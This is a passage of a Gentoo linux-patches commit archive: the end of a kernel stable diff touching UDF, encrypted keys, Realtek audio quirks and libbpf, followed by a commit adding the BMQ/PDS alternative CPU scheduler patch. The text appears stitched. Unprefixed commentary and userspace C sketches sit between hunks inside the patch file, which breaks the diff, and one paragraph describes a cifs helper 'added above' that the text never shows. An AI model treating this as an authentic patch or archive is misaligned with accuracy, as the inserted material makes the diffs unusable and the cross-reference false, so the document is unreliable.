+@@ -664,19 +657,17 @@ static int udf_extend_file(struct inode *inode, loff_t newsize)
+ 		extent.extLength |= etype << 30;
+ 	}
+ 
+-	partial_final_block = newsize & (sb->s_blocksize - 1);
++	new_elen = ((loff_t)offset << inode->i_blkbits) |
++					(newsize & (sb->s_blocksize - 1));
+ 
+ 	/* File has extent covering the new size (could happen when extending
+ 	 * inside a block)?
+ 	 */
+-	if (within_final_block) {
++	if (within_last_ext) {
+ 		/* Extending file within the last file block */
+-		udf_do_extend_final_block(inode, &epos, &extent,
+-					  partial_final_block);
++		udf_do_extend_final_block(inode, &epos, &extent, new_elen);
+ 	} else {
+-		loff_t add = ((loff_t)offset << sb->s_blocksize_bits) |
+-			     partial_final_block;
+-		err = udf_do_extend_file(inode, &epos, &extent, add);
++		err = udf_do_extend_file(inode, &epos, &extent, new_elen);
+ 	}
+ 
+ 	if (err < 0)
+@@ -777,10 +768,11 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 		goto out_free;
+ 	}
+ 
+-	/* Are we beyond EOF? */
++	/* Are we beyond EOF and preallocated extent? */
+ 	if (etype == -1) {
+ 		int ret;
+ 		loff_t hole_len;
++
+ 		isBeyondEOF = true;
+ 		if (count) {
+ 			if (c)
+diff --git a/fs/udf/truncate.c b/fs/udf/truncate.c
+index 532cda99644ee..036ebd892b852 100644
+--- a/fs/udf/truncate.c
++++ b/fs/udf/truncate.c
+@@ -120,60 +120,42 @@ void udf_truncate_tail_extent(struct inode *inode)
+ 
+ void udf_discard_prealloc(struct inode *inode)
+ {
+-	struct extent_position epos = { NULL, 0, {0, 0} };
++	struct extent_position epos = {};
++	struct extent_position prev_epos = {};
+ 	struct kernel_lb_addr eloc;
+ 	uint32_t elen;
+ 	uint64_t lbcount = 0;
+ 	int8_t etype = -1, netype;
+-	int adsize;
+ 	struct udf_inode_info *iinfo = UDF_I(inode);
++	int bsize = 1 << inode->i_blkbits;
+ 
+ 	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB ||
+-	    inode->i_size == iinfo->i_lenExtents)
++	    ALIGN(inode->i_size, bsize) == ALIGN(iinfo->i_lenExtents, bsize))
+ 		return;
+ 
+-	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
+-		adsize = sizeof(struct short_ad);
+-	else if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
+-		adsize = sizeof(struct long_ad);
+-	else
+-		adsize = 0;
+-
+ 	epos.block = iinfo->i_location;
+ 
+ 	/* Find the last extent in the file */
+-	while ((netype = udf_next_aext(inode, &epos, &eloc, &elen, 1)) != -1) {
+-		etype = netype;
++	while ((netype = udf_next_aext(inode, &epos, &eloc, &elen, 0)) != -1) {
++		brelse(prev_epos.bh);
++		prev_epos = epos;
++		if (prev_epos.bh)
++			get_bh(prev_epos.bh);
++
++		etype = udf_next_aext(inode, &epos, &eloc, &elen, 1);
+ 		lbcount += elen;
+ 	}
+ 	if (etype == (EXT_NOT_RECORDED_ALLOCATED >> 30)) {
+-		epos.offset -= adsize;
+ 		lbcount -= elen;
+-		extent_trunc(inode, &epos, &eloc, etype, elen, 0);
+-		if (!epos.bh) {
+-			iinfo->i_lenAlloc =
+-				epos.offset -
+-				udf_file_entry_alloc_offset(inode);
+-			mark_inode_dirty(inode);
+-		} else {
+-			struct allocExtDesc *aed =
+-				(struct allocExtDesc *)(epos.bh->b_data);
+-			aed->lengthAllocDescs =
+-				cpu_to_le32(epos.offset -
+-					    sizeof(struct allocExtDesc));
+-			if (!UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_STRICT) ||
+-			    UDF_SB(inode->i_sb)->s_udfrev >= 0x0201)
+-				udf_update_tag(epos.bh->b_data, epos.offset);
+-			else
+-				udf_update_tag(epos.bh->b_data,
+-					       sizeof(struct allocExtDesc));
+-			mark_buffer_dirty_inode(epos.bh, inode);
+-		}
++		udf_delete_aext(inode, prev_epos);
++		udf_free_blocks(inode->i_sb, inode, &eloc, 0,
++				DIV_ROUND_UP(elen, 1 << inode->i_blkbits));
+ 	}
+ 	/* This inode entry is in-memory only and thus we don't have to mark
+ 	 * the inode dirty */
+ 	iinfo->i_lenExtents = lbcount;
+ 	brelse(epos.bh);
++	brelse(prev_epos.bh);
+ }
+ 
+ static void udf_update_alloc_ext_desc(struct inode *inode,
+diff --git a/security/keys/encrypted-keys/encrypted.c b/security/keys/encrypted-keys/encrypted.c
+index e05cfc2e49aeb..1e313982af02a 100644
+--- a/security/keys/encrypted-keys/encrypted.c
++++ b/security/keys/encrypted-keys/encrypted.c
+@@ -627,7 +627,7 @@ static struct encrypted_key_payload *encrypted_key_alloc(struct key *key,
+ 			pr_err("encrypted key: instantiation of keys using provided decrypted data is disabled since CONFIG_USER_DECRYPTED_DATA is set to false\n");
+ 			return ERR_PTR(-EINVAL);
+ 		}
+-		if (strlen(decrypted_data) != decrypted_datalen) {
++		if (strlen(decrypted_data) != decrypted_datalen * 2) {
+ 			pr_err("encrypted key: decrypted data provided does not match decrypted data length provided\n");
+ 			return ERR_PTR(-EINVAL);
+ 		}
+@@ -791,8 +791,8 @@ static int encrypted_init(struct encrypted_key_payload *epayload,
+ 		ret = encrypted_key_decrypt(epayload, format, hex_encoded_iv);
+ 	} else if (decrypted_data) {
+ 		get_random_bytes(epayload->iv, ivsize);
+-		memcpy(epayload->decrypted_data, decrypted_data,
+-				   epayload->decrypted_datalen);
++		ret = hex2bin(epayload->decrypted_data, decrypted_data,
++			      epayload->decrypted_datalen);
+ 	} else {
+ 		get_random_bytes(epayload->iv, ivsize);
+ 		get_random_bytes(epayload->decrypted_data, epayload->decrypted_datalen);
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index e5c0363856664..cf7c825078dc7 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9354,6 +9354,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	 SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad1, "HP EliteBook 840 14 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+ 	SND_PCI_QUIRK(0x1043, 0x106d, "Asus K53BE", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 4221f73a74d01..3937f66c7f8d6 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -1963,7 +1963,7 @@ static int btf_dump_struct_data(struct btf_dump *d,
+ {
+ 	const struct btf_member *m = btf_members(t);
+ 	__u16 n = btf_vlen(t);
+-	int i, err;
++	int i, err = 0;
+ 
+ 	/* note that we increment depth before calling btf_dump_print() below;
+ 	 * this is intentional.  btf_dump_data_newline() will not print a
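
For reference, the cifs_get_num_sgs() helper added above sizes the
scatterlist by counting one entry per physically contiguous buffer, but
one entry per page touched for vmalloc'd buffers, which are only
virtually contiguous. The per-buffer rule can be checked with a small
userspace sketch (illustrative only; the 4096-byte PAGE_SIZE and the
helper name here are assumptions, not kernel API):

	#include <stdio.h>

	#define PAGE_SIZE 4096UL
	#define DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d))

	/* scatterlist entries needed for a vmalloc'd buffer of 'len'
	 * bytes starting 'off' bytes into its first page */
	static unsigned long nents_for_vmalloc(unsigned long off,
					       unsigned long len)
	{
		return DIV_ROUND_UP(off + len, PAGE_SIZE);
	}

	int main(void)
	{
		/* 5000 bytes starting 300 bytes into a page span 2 pages */
		printf("%lu\n", nents_for_vmalloc(300, 5000));
		return 0;
	}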


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2022-12-16 20:25 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2022-12-16 20:25 UTC (permalink / raw
  To: gentoo-commits

commit:     c6503b1df996ec64a52b0c466eeca376b653b2aa
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Dec 16 20:24:54 2022 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Dec 16 20:24:54 2022 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c6503b1d

Add the BMQ(BitMap Queue) Scheduler via USE=experimental

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                 |     3 +
 5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch | 10076 ++++++++++++++++++++++++++
 2 files changed, 10079 insertions(+)

diff --git a/0000_README b/0000_README
index 5e68531e..acaedd58 100644
--- a/0000_README
+++ b/0000_README
@@ -83,3 +83,6 @@ Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
 
+Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch
+From:   https://gitlab.com/alfredchen/projectc
+Desc:   BMQ (BitMap Queue) Scheduler. A new CPU scheduler developed from PDS (included). Inspired by the scheduler in Zircon.

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch
new file mode 100644
index 00000000..783f3bca
--- /dev/null
+++ b/5020_BMQ-and-PDS-io-scheduler-v6.1-r0.patch
@@ -0,0 +1,10076 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 42af9ca0127e..31747ec54f9d 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -5406,6 +5406,12 @@
+ 	sa1100ir	[NET]
+ 			See drivers/net/irda/sa1100_ir.c.
+ 
++	sched_timeslice=
++			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
++			Format: integer 2, 4
++			Default: 4
++			See Documentation/scheduler/sched-BMQ.txt
++
+ 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
+ 
+ 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
+diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
+index 98d1b198b2b4..d7c78a107f93 100644
+--- a/Documentation/admin-guide/sysctl/kernel.rst
++++ b/Documentation/admin-guide/sysctl/kernel.rst
+@@ -1552,3 +1552,13 @@ is 10 seconds.
+ 
+ The softlockup threshold is (``2 * watchdog_thresh``). Setting this
+ tunable to zero will disable lockup detection altogether.
++
++yield_type:
++===========
++
++BMQ/PDS CPU scheduler only. This determines what type of yield calls
++to sched_yield will perform.
++
++  0 - No yield.
++  1 - Deboost and requeue task. (default)
++  2 - Set run queue skip task.
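++
++For example, to disable yields at run time (a sketch; the file lives
++under the usual sysctl path)::
++
++  echo 0 > /proc/sys/kernel/yield_type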
+diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
+new file mode 100644
+index 000000000000..05c84eec0f31
+--- /dev/null
++++ b/Documentation/scheduler/sched-BMQ.txt
+@@ -0,0 +1,110 @@
++                         BitMap queue CPU Scheduler
++                         --------------------------
++
++CONTENT
++========
++
++ Background
++ Design
++   Overview
++   Task policy
++   Priority management
++   BitMap Queue
++   CPU Assignment and Migration
++
++
++Background
++==========
++
++The BitMap Queue CPU scheduler, referred to as BMQ from here on, is an
++evolution of the previous Priority and Deadline based Skiplist multiple
++queue scheduler (PDS), and is inspired by the Zircon scheduler. Its goal
++is to keep the scheduler code simple while remaining efficient and
++scalable for interactive tasks such as desktop use, movie playback and
++gaming.
++
++Design
++======
++
++Overview
++--------
++
++BMQ uses a per-CPU run queue design: each (logical) CPU has its own run
++queue and is responsible for scheduling the tasks placed into it.
++
++The run queue is a set of priority queues. In terms of data structures,
++these queues are FIFO queues for non-rt tasks and priority queues for rt
++tasks; see BitMap Queue below for details. BMQ is optimized for non-rt
++tasks, since most applications are non-rt tasks. Whether a queue is FIFO
++or priority, each queue is an ordered list of runnable tasks awaiting
++execution, and the data structures are the same. When it is time for a
++new task to run, the scheduler simply looks for the lowest numbered queue
++that contains a task and runs the first task from the head of that queue.
++The per-CPU idle task is also kept in the run queue, so the scheduler can
++always find a task to run.
++
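++In C-like pseudo-code, the pick-next step amounts to the following
++(an illustrative sketch: the bitmap and head-array field names are
++assumptions, while sq_node is the actual list linkage this patch adds
++to task_struct):
++
++	idx  = find_first_bit(rq->queue.bitmap, nr_queues);
++	next = list_first_entry(&rq->queue.heads[idx],
++				struct task_struct, sq_node);
++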
++Each task is assigned the same timeslice (4 ms by default) when it is
++picked to start running, and is reinserted at the end of the appropriate
++priority queue when it has used up its whole timeslice. When the
++scheduler selects a new task from the priority queue, it sets the CPU's
++preemption timer for the remainder of the previous timeslice. When that
++timer fires the scheduler stops executing that task, selects another
++task and starts over again.
++
++If a task blocks waiting for a shared resource then it's taken out of its
++priority queue and is placed in a wait queue for the shared resource. When it
++is unblocked it will be reinserted in the appropriate priority queue of an
++eligible CPU.
++
++Task policy
++-----------
++
++BMQ supports the DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task
++policies, like the mainline CFS scheduler, but it is heavily optimized
++for non-rt tasks, that is, NORMAL/BATCH/IDLE policy tasks. The
++implementation details of each policy follow.
++
++DEADLINE
++	It is squashed as priority 0 FIFO task.
++
++FIFO/RR
++	All RT tasks share one single priority queue in the BMQ run queue
++design. The complexity of the insert operation is O(n). BMQ is not
++designed for systems that mostly run rt policy tasks.
++
++NORMAL/BATCH/IDLE
++	BATCH and IDLE tasks are treated as the same policy. They compete for
++CPU with NORMAL policy tasks, but they simply don't boost. To control
++the priority of NORMAL/BATCH/IDLE tasks, use the nice level.
++
++ISO
++	ISO policy is not supported in BMQ. Please use nice level -20 NORMAL policy
++task instead.
++
++Priority management
++-------------------
++
++RT tasks have priorities from 0-99. For non-rt tasks, there are three
++different factors used to determine the effective priority of a task,
++the effective priority being what determines which queue it will be in.
++
++The first factor is simply the task's static priority, which is assigned
++from the task's nice level: [-20, 19] from userland's point of view and
++[0, 39] internally.
++
++The second factor is the priority boost. This is a value bounded to
++[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] that is used to offset the base
++priority; it is modified in the following cases:
++
++* When a thread has used up its entire timeslice, it is always deboosted
++by increasing its boost value by one.
++* When a thread gives up CPU control (voluntarily or not) in order to
++reschedule, and its switch-in time (the time since it was last switched
++in and run) is below the threshold derived from its priority boost, it
++is boosted by decreasing its boost value by one, capped at 0 (it won't
++go negative).
++
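++Putting the two factors together, the effective priority of a non-rt
++task is roughly (a sketch, using the boost_prio field this patch adds
++for BMQ):
++
++	prio = p->static_prio + p->boost_prio;	/* then mapped to a queue */
++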
++The intent in this system is to ensure that interactive threads are serviced
++quickly. These are usually the threads that interact directly with the user
++and cause user-perceivable latency. These threads usually do little work and
++spend most of their time blocked awaiting another user event. So they get the
++priority boost from unblocking while background threads that do most of the
++processing receive the priority penalty for using their entire timeslice.
+diff --git a/fs/proc/base.c b/fs/proc/base.c
+index 9e479d7d202b..2a8530021b23 100644
+--- a/fs/proc/base.c
++++ b/fs/proc/base.c
+@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
+ 		seq_puts(m, "0 0 0\n");
+ 	else
+ 		seq_printf(m, "%llu %llu %lu\n",
+-		   (unsigned long long)task->se.sum_exec_runtime,
++		   (unsigned long long)tsk_seruntime(task),
+ 		   (unsigned long long)task->sched_info.run_delay,
+ 		   task->sched_info.pcount);
+ 
+diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
+index 8874f681b056..59eb72bf7d5f 100644
+--- a/include/asm-generic/resource.h
++++ b/include/asm-generic/resource.h
+@@ -23,7 +23,7 @@
+ 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
+ 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
+-	[RLIMIT_NICE]		= { 0, 0 },				\
++	[RLIMIT_NICE]		= { 30, 30 },				\
+ 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
+ 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ }
+diff --git a/include/linux/sched.h b/include/linux/sched.h
+index ffb6eb55cd13..2e730a59caa2 100644
+--- a/include/linux/sched.h
++++ b/include/linux/sched.h
+@@ -762,8 +762,14 @@ struct task_struct {
+ 	unsigned int			ptrace;
+ 
+ #ifdef CONFIG_SMP
+-	int				on_cpu;
+ 	struct __call_single_node	wake_entry;
++#endif
++#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
++	int				on_cpu;
++#endif
++
++#ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 	unsigned int			wakee_flips;
+ 	unsigned long			wakee_flip_decay_ts;
+ 	struct task_struct		*last_wakee;
+@@ -777,6 +783,7 @@ struct task_struct {
+ 	 */
+ 	int				recent_used_cpu;
+ 	int				wake_cpu;
++#endif /* !CONFIG_SCHED_ALT */
+ #endif
+ 	int				on_rq;
+ 
+@@ -785,6 +792,20 @@ struct task_struct {
+ 	int				normal_prio;
+ 	unsigned int			rt_priority;
+ 
++#ifdef CONFIG_SCHED_ALT
++	u64				last_ran;
++	s64				time_slice;
++	int				sq_idx;
++	struct list_head		sq_node;
++#ifdef CONFIG_SCHED_BMQ
++	int				boost_prio;
++#endif /* CONFIG_SCHED_BMQ */
++#ifdef CONFIG_SCHED_PDS
++	u64				deadline;
++#endif /* CONFIG_SCHED_PDS */
++	/* sched_clock time spent running */
++	u64				sched_time;
++#else /* !CONFIG_SCHED_ALT */
+ 	struct sched_entity		se;
+ 	struct sched_rt_entity		rt;
+ 	struct sched_dl_entity		dl;
+@@ -795,6 +816,7 @@ struct task_struct {
+ 	unsigned long			core_cookie;
+ 	unsigned int			core_occupation;
+ #endif
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_CGROUP_SCHED
+ 	struct task_group		*sched_task_group;
+@@ -1545,6 +1567,15 @@ struct task_struct {
+ 	 */
+ };
+ 
++#ifdef CONFIG_SCHED_ALT
++#define tsk_seruntime(t)		((t)->sched_time)
++/* replace the uncertain rt_timeout with 0UL */
++#define tsk_rttimeout(t)		(0UL)
++#else /* CFS */
++#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
++#define tsk_rttimeout(t)	((t)->rt.timeout)
++#endif /* !CONFIG_SCHED_ALT */
++
+ static inline struct pid *task_pid(struct task_struct *task)
+ {
+ 	return task->thread_pid;
+diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
+index 7c83d4d5a971..fa30f98cb2be 100644
+--- a/include/linux/sched/deadline.h
++++ b/include/linux/sched/deadline.h
+@@ -1,5 +1,24 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+ 
++#ifdef CONFIG_SCHED_ALT
++
++static inline int dl_task(struct task_struct *p)
++{
++	return 0;
++}
++
++#ifdef CONFIG_SCHED_BMQ
++#define __tsk_deadline(p)	(0UL)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
++#endif
++
++#else
++
++#define __tsk_deadline(p)	((p)->dl.deadline)
++
+ /*
+  * SCHED_DEADLINE tasks has negative priorities, reflecting
+  * the fact that any of them has higher prio than RT and
+@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
+ {
+ 	return dl_prio(p->prio);
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ static inline bool dl_time_before(u64 a, u64 b)
+ {
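
The PDS flavor of __tsk_deadline above packs the priority into the top
8 bits of a u64 and the deadline into the low 56 bits, so a single
unsigned comparison orders waiters by priority first and deadline second.
A userspace sketch of that packing (the explicit deadline mask is added
here for safety; the kernel macro relies on deadlines staying below 2^56):

#include <inttypes.h>
#include <stdio.h>

static uint64_t pack(uint64_t prio, uint64_t deadline)
{
        return (prio << 56) | (deadline & ((1ULL << 56) - 1));
}

int main(void)
{
        uint64_t a = pack(128, 1000);   /* higher priority (lower prio value) */
        uint64_t b = pack(129, 10);     /* lower priority, earlier deadline */

        /* a < b: priority dominates; the deadline only breaks ties. */
        printf("a=%#" PRIx64 " b=%#" PRIx64 " a<b=%d\n", a, b, a < b);
        return 0;
}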
+diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
+index ab83d85e1183..6af9ae681116 100644
+--- a/include/linux/sched/prio.h
++++ b/include/linux/sched/prio.h
+@@ -18,6 +18,32 @@
+ #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
+ #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
+ 
++#ifdef CONFIG_SCHED_ALT
++
++/* Undefine MAX_PRIO and DEFAULT_PRIO */
++#undef MAX_PRIO
++#undef DEFAULT_PRIO
++
++/* +/- priority levels from the base priority */
++#ifdef CONFIG_SCHED_BMQ
++#define MAX_PRIORITY_ADJ	(7)
++
++#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
++#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define MAX_PRIORITY_ADJ	(0)
++
++#define MIN_NORMAL_PRIO		(128)
++#define NORMAL_PRIO_NUM		(64)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
++#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
++#endif
++
++#endif /* CONFIG_SCHED_ALT */
++
+ /*
+  * Convert user-nice values [ -20 ... 0 ... 19 ]
+  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
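
Plugging in the mainline values MAX_RT_PRIO = 100 and NICE_WIDTH = 40,
the redefinitions above give BMQ a normal-priority range of [100, 140)
with DEFAULT_PRIO = 120, and PDS a range of [128, 192) with
DEFAULT_PRIO = 172. A quick arithmetic check (userspace sketch):

#include <assert.h>

#define MAX_RT_PRIO 100
#define NICE_WIDTH  40

int main(void)
{
        /* BMQ */
        assert(MAX_RT_PRIO + NICE_WIDTH == 140);        /* MAX_PRIO */
        assert(MAX_RT_PRIO + NICE_WIDTH / 2 == 120);    /* DEFAULT_PRIO */

        /* PDS */
        assert(128 + 64 == 192);                        /* MAX_PRIO */
        assert(192 - NICE_WIDTH / 2 == 172);            /* DEFAULT_PRIO */
        return 0;
}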
+diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
+index 994c25640e15..8c050a59ece1 100644
+--- a/include/linux/sched/rt.h
++++ b/include/linux/sched/rt.h
+@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
+ 
+ 	if (policy == SCHED_FIFO || policy == SCHED_RR)
+ 		return true;
++#ifndef CONFIG_SCHED_ALT
+ 	if (policy == SCHED_DEADLINE)
+ 		return true;
++#endif
+ 	return false;
+ }
+ 
+diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
+index 816df6cc444e..c8da08e18c91 100644
+--- a/include/linux/sched/topology.h
++++ b/include/linux/sched/topology.h
+@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
+ 
+ #endif	/* !CONFIG_SMP */
+ 
+-#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
++#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
++	!defined(CONFIG_SCHED_ALT)
+ extern void rebuild_sched_domains_energy(void);
+ #else
+ static inline void rebuild_sched_domains_energy(void)
+diff --git a/init/Kconfig b/init/Kconfig
+index 94125d3b6893..c87ba766d354 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -819,6 +819,7 @@ menu "Scheduler features"
+ config UCLAMP_TASK
+ 	bool "Enable utilization clamping for RT/FAIR tasks"
+ 	depends on CPU_FREQ_GOV_SCHEDUTIL
++	depends on !SCHED_ALT
+ 	help
+ 	  This feature enables the scheduler to track the clamped utilization
+ 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
+@@ -865,6 +866,35 @@ config UCLAMP_BUCKETS_COUNT
+ 
+ 	  If in doubt, use the default value.
+ 
++menuconfig SCHED_ALT
++	bool "Alternative CPU Schedulers"
++	default n
++	help
++	  This feature enables the alternative CPU schedulers.
++
++if SCHED_ALT
++
++choice
++	prompt "Alternative CPU Scheduler"
++	default SCHED_BMQ
++
++config SCHED_BMQ
++	bool "BMQ CPU scheduler"
++	help
++	  The BitMap Queue CPU scheduler for excellent interactivity and
++	  responsiveness on the desktop and solid scalability on normal
++	  hardware and commodity servers.
++
++config SCHED_PDS
++	bool "PDS CPU scheduler"
++	help
++	  The Priority and Deadline based Skip list multiple queue CPU
++	  Scheduler.
++
++endchoice
++
++endif
++
+ endmenu
+ 
+ #
+@@ -918,6 +948,7 @@ config NUMA_BALANCING
+ 	depends on ARCH_SUPPORTS_NUMA_BALANCING
+ 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
+ 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
++	depends on !SCHED_ALT
+ 	help
+ 	  This option adds support for automatic NUMA aware memory/task placement.
+ 	  The mechanism is quite primitive and is based on migrating memory when
+@@ -1015,6 +1046,7 @@ config FAIR_GROUP_SCHED
+ 	depends on CGROUP_SCHED
+ 	default CGROUP_SCHED
+ 
++if !SCHED_ALT
+ config CFS_BANDWIDTH
+ 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
+ 	depends on FAIR_GROUP_SCHED
+@@ -1037,6 +1069,7 @@ config RT_GROUP_SCHED
+ 	  realtime bandwidth for them.
+ 	  See Documentation/scheduler/sched-rt-group.rst for more information.
+ 
++endif #!SCHED_ALT
+ endif #CGROUP_SCHED
+ 
+ config UCLAMP_TASK_GROUP
+@@ -1281,6 +1314,7 @@ config CHECKPOINT_RESTORE
+ 
+ config SCHED_AUTOGROUP
+ 	bool "Automatic process group scheduling"
++	depends on !SCHED_ALT
+ 	select CGROUPS
+ 	select CGROUP_SCHED
+ 	select FAIR_GROUP_SCHED
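
Given this Kconfig wiring, enabling one of the schedulers in a kernel
.config looks roughly like the fragment below; note that once SCHED_ALT
is set, options such as UCLAMP_TASK, NUMA_BALANCING, SCHED_AUTOGROUP and
SCHED_CORE become unavailable:

CONFIG_SCHED_ALT=y
CONFIG_SCHED_BMQ=y
# CONFIG_SCHED_PDS is not set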
+diff --git a/init/init_task.c b/init/init_task.c
+index ff6c4b9bfe6b..19e9c662d1a1 100644
+--- a/init/init_task.c
++++ b/init/init_task.c
+@@ -75,9 +75,15 @@ struct task_struct init_task
+ 	.stack		= init_stack,
+ 	.usage		= REFCOUNT_INIT(2),
+ 	.flags		= PF_KTHREAD,
++#ifdef CONFIG_SCHED_ALT
++	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++	.static_prio	= DEFAULT_PRIO,
++	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++#else
+ 	.prio		= MAX_PRIO - 20,
+ 	.static_prio	= MAX_PRIO - 20,
+ 	.normal_prio	= MAX_PRIO - 20,
++#endif
+ 	.policy		= SCHED_NORMAL,
+ 	.cpus_ptr	= &init_task.cpus_mask,
+ 	.user_cpus_ptr	= NULL,
+@@ -88,6 +94,17 @@ struct task_struct init_task
+ 	.restart_block	= {
+ 		.fn = do_no_restart_syscall,
+ 	},
++#ifdef CONFIG_SCHED_ALT
++	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
++#ifdef CONFIG_SCHED_BMQ
++	.boost_prio	= 0,
++	.sq_idx		= 15,
++#endif
++#ifdef CONFIG_SCHED_PDS
++	.deadline	= 0,
++#endif
++	.time_slice	= HZ,
++#else
+ 	.se		= {
+ 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
+ 	},
+@@ -95,6 +112,7 @@ struct task_struct init_task
+ 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
+ 		.time_slice	= RR_TIMESLICE,
+ 	},
++#endif
+ 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
+ #ifdef CONFIG_SMP
+ 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
+diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
+index c2f1fd95a821..41654679b1b2 100644
+--- a/kernel/Kconfig.preempt
++++ b/kernel/Kconfig.preempt
+@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
+ 
+ config SCHED_CORE
+ 	bool "Core Scheduling for SMT"
